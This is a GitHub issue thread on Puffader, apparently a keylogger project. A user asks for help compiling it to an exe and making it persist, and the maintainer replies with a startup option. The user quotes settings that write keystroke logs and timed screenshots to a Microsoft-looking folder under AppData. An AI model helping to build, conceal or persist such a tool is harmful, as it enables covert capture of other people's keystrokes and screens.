### ISSUE TITLE
compile issue

### ISSUE THREAD

**Issue by tehseensagar** [xp4xbox/Puffader#26]
Widows 8.1
Python 2.7
lasted files from github

When compiling exe getting following error
Missing modules:
? AppKit imported from pyautogui._pyautogui_osx
? Carbon imported from plistlib
? Carbon.File imported from plistlib
? Carbon.Files imported from plistlib
? FCNTL imported from Xlib.support.unix_connect
? ICCProfile imported from PIL.PngImagePlugin
? MacOS imported from platform
? PIL._imagingagg imported from PIL.ImageDraw
? Quartz imported from pyautogui._pyautogui_osx
? Tkinter imported from pymsgbox
? _dummy_threading imported from dummy_threading
? _emx_link imported from os
? _grabscreen imported from PIL.ImageGrab
? _imaging_gif imported from PIL.GifImagePlugin
? _scproxy imported from urllib
? builtins imported from PIL.Image
? ce imported from os
? cv2 imported from pyscreeze
? email.MIMEImage imported from puffader__main__
? email.MIMEMultipart imported from puffader__main__
? fcntl imported from Xlib.support.unix_connect, subprocess
? gestalt imported from platform
? java.lang imported from platform
? numpy imported from pyscreeze
? org.python.core imported from copy, pickle
? os.path imported from os, shlex
? os2 imported from os
? os2emxpath imported from os
? posix imported from os
? pwd imported from getpass, posixpath
? riscos imported from os
? riscosenviron imported from os
? riscospath imported from os
? rourl2path imported from urllib
? termios imported from getpass
? tkinter imported from pymsgbox
? vms_lib imported from platform
? winreg imported from platform
This is not necessarily a problem - the modules may not be needed on this platfo
rm.
Regards

**Comment by xp4xbox** [comment]
Are you using cx_freeze or py2exe?

**Comment by tehseensagar** [comment]
I'm using python cx_freeze_setup.py build but I do have py2exe as well , shell I use py2exe to avoid these errors. 

Further more I don't understand how to make it persistence . Do I need to put persistence.ps1 in root directory where setup.py and Puffer.py is located. 

Following message seen when compiling using py2exe

`The following modules appear to be missing
['AppKit', 'ICCProfile', 'PIL._imagingagg', 'Quartz', '_grabscreen', '_imaging_g
if', '_scproxy', 'builtins', 'cv2', 'email.MIMEImage', 'email.MIMEMultipart', 'numpy', 'tkinter']`


Puffer.py setting for directoy as below

`blnStoreLocal = "True"  # True to save logs/screens locally
strLogFile = "C:/Users/%username%/AppData/Local/Microsoft/Inteldat.txt"  # set non-protected path to text file eg. c:/temp/test.txt

blnLogClick = "True"  # for logging window clicks
blnBackRemove = "True"  # set this to True if you prefer the program removes the last key if the user types backspace

blnScrShot = "True"  # set to True for capturing screenshots
strScrDir = "C:/Users/%username%/AppData/Local/Microsoft"  # set non-protected dir for scrshot location if storing locally. eg c:/temp
intScrTime = 120  # set time for taking screen in seconds`


Persistence.ps1 as below
`$strFileDir = "Intel"`


So far after running compiled exe from dist Puffader.exe  I don't see any Inteldat.txt file in above mentioned path.


Regards

**Comment by xp4xbox** [comment]
I have been meaning to improve and simply this project for a while now. I am gonna make some changes to the project tomorrow.

**Comment by tehseensagar** [comment]
@xp4xbox  greate and also simplify the persistence method as well just a config based set it to true it will add it on path such as "C:/Users/%username%/AppData" . Hope to hear from you further more I will test the updated version once you fixed the bug.

Regards

**Comment by xp4xbox** [comment]
Ok, so I updated the rep. So you can nuke persistence, if you want program to start up, just simply set the new option blnAddToStartup to True. Also I updated the setup.py, so when you compile the program, it will create standalone exe.

**Comment by xp4xbox** [comment]
Also, I just built the program and I have the same message. I ran it, and it worked fine, so you can just ignore that message. If you have any problems let me know.
